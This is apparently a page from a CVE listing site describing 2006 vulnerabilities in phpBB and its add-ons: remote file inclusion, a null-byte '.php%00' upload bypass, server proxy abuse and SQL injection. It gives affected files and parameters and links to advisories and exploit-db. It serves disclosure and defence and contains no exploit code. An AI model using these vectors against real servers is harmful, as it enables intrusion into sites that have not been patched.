CVE-2006-4893
https://notcve.org/view.php?id=CVE-2006-4893
PHP remote file inclusion vulnerability in bb_usage_stats/includes/bb_usage_stats.php in phpBB XS 0.58 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter, a different vector than CVE-2006-4780. Vulnerabilidad PHP de inclusión remota de archivo en bb_usage_stats/includes/bb_usage_stats.php en phpBB XS 0.58 y anteriores permite a atacantes remotos ejecutar código PHP de su elección vía una URL en el parámetro phpbb_root_path, un vector diferente que CVE-2006-4780. • http://nyubicrew.org/adv/Noge_adv_02.txt http://secunia.com/advisories/21970 http://securityreason.com/securityalert/1617 http://www.osvdb.org/28918 http://www.securityfocus.com/archive/1/446108/100/0/threaded http://www.securityfocus.com/archive/1/452469/100/200/threaded http://www.securityfocus.com/bid/20046 http://www.vupen.com/english/advisories/2006/3654 •
CVE-2006-4779 – Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion
https://notcve.org/view.php?id=CVE-2006-4779
PHP remote file inclusion vulnerability in includes/functions_portal.php in Vitrax Premodded phpBB 1.0.6-R3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. Vulnerabilidad PHP de inclusión remota de archivo en includes/functions_portal.php en Vitrax Premodded phpBB 1.0.6-R3 y anteriores permite a atacantes remotos ejecutar código PHP de su elección mediante una URL en el parámetro phpbb_root_path. • https://www.exploit-db.com/exploits/2353 http://secunia.com/advisories/21882 http://www.securityfocus.com/bid/19979 http://www.vupen.com/english/advisories/2006/3571 https://exchange.xforce.ibmcloud.com/vulnerabilities/28889 •
CVE-2006-4758
https://notcve.org/view.php?id=CVE-2006-4758
phpBB 2.0.21 does not properly handle pathnames ending in %00, which allows remote authenticated administrative users to upload arbitrary files, as demonstrated by a query to admin/admin_board.php with an avatar_path parameter ending in .php%00. phpBB 2.0.21 no maneja adecuadamente los nombres de ruta que finalicen en %00, lo cual permite a un usuario remoto administrador validado actualizar ficheros de su elección, según se puede ver a través de la consulta a admin/admin_board.php con el parámetro avatar_path terminado en .php%00. • http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=388120 http://secunia.com/advisories/22188 http://secunia.com/advisories/28871 http://www.debian.org/security/2008/dsa-1488 http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=489624 http://www.security.nnov.ru/Odocument221.html http://www.securityfocus.com/archive/1/445788/100/0/threaded http://www.securityfocus.com/bid/20347 http://www.securityfocus.com/bid/21806 https://exchange.xforce.ibmcloud.com/vulnerabilities/28884 •
CVE-2006-4450 – phpBB 2.0.20 - Unauthorized HTTP Proxy
https://notcve.org/view.php?id=CVE-2006-4450
usercp_avatar.php in PHPBB 2.0.20, when avatar uploading is enabled, allows remote attackers to use the server as a web proxy by submitting a URL to the avatarurl parameter, which is then used in an HTTP GET request. usercp_avatar.php en PHPBB 2.0.20, cuando la subida de ficheros avatar está habilitada, permite a atacantes remotos usar el servidor como un proxy web enviando una URL al parámetro avatarurl, el cual es usado entonces en una petición HTTP GET. • https://www.exploit-db.com/exploits/27863 http://archives.neohapsis.com/archives/bugtraq/2006-05/0238.html http://secunia.com/advisories/20093 http://securityreason.com/securityalert/1470 http://www.securityfocus.com/bid/17965 https://exchange.xforce.ibmcloud.com/vulnerabilities/26537 •
CVE-2006-3940 – phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection
https://notcve.org/view.php?id=CVE-2006-3940
Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via (1) the ar parameter in auction_room.php and (2) the u parameter in auction_store.php. NOTE: the auction_rating.php vector is already covered by CVE-2005-1234. NOTE: the original disclosure states that the product name is "PHP-Auction", but this is probably an error. Múltiples vulnerabilidades de inyección SQL en phpbb-Auction permiten a atacantes remotos ejecutar comandos SQL de su elección a través del parámetro (1) "ar" en auction_room.php y (2) "u" en auction_store.php. NOTA: El vector auction_rating.php está ya descrito en CVE-2005-1234. NOTA: La descripción original apunta que el nombre de producto es "PHP-Auction", pero es un error probablemente. • https://www.exploit-db.com/exploits/28282 https://www.exploit-db.com/exploits/28281 http://securityreason.com/securityalert/1306 http://www.aria-security.net/advisory/phpauction.txt http://www.securityfocus.com/archive/1/441190/100/0/threaded http://www.securityfocus.com/bid/19179 https://exchange.xforce.ibmcloud.com/vulnerabilities/28006 •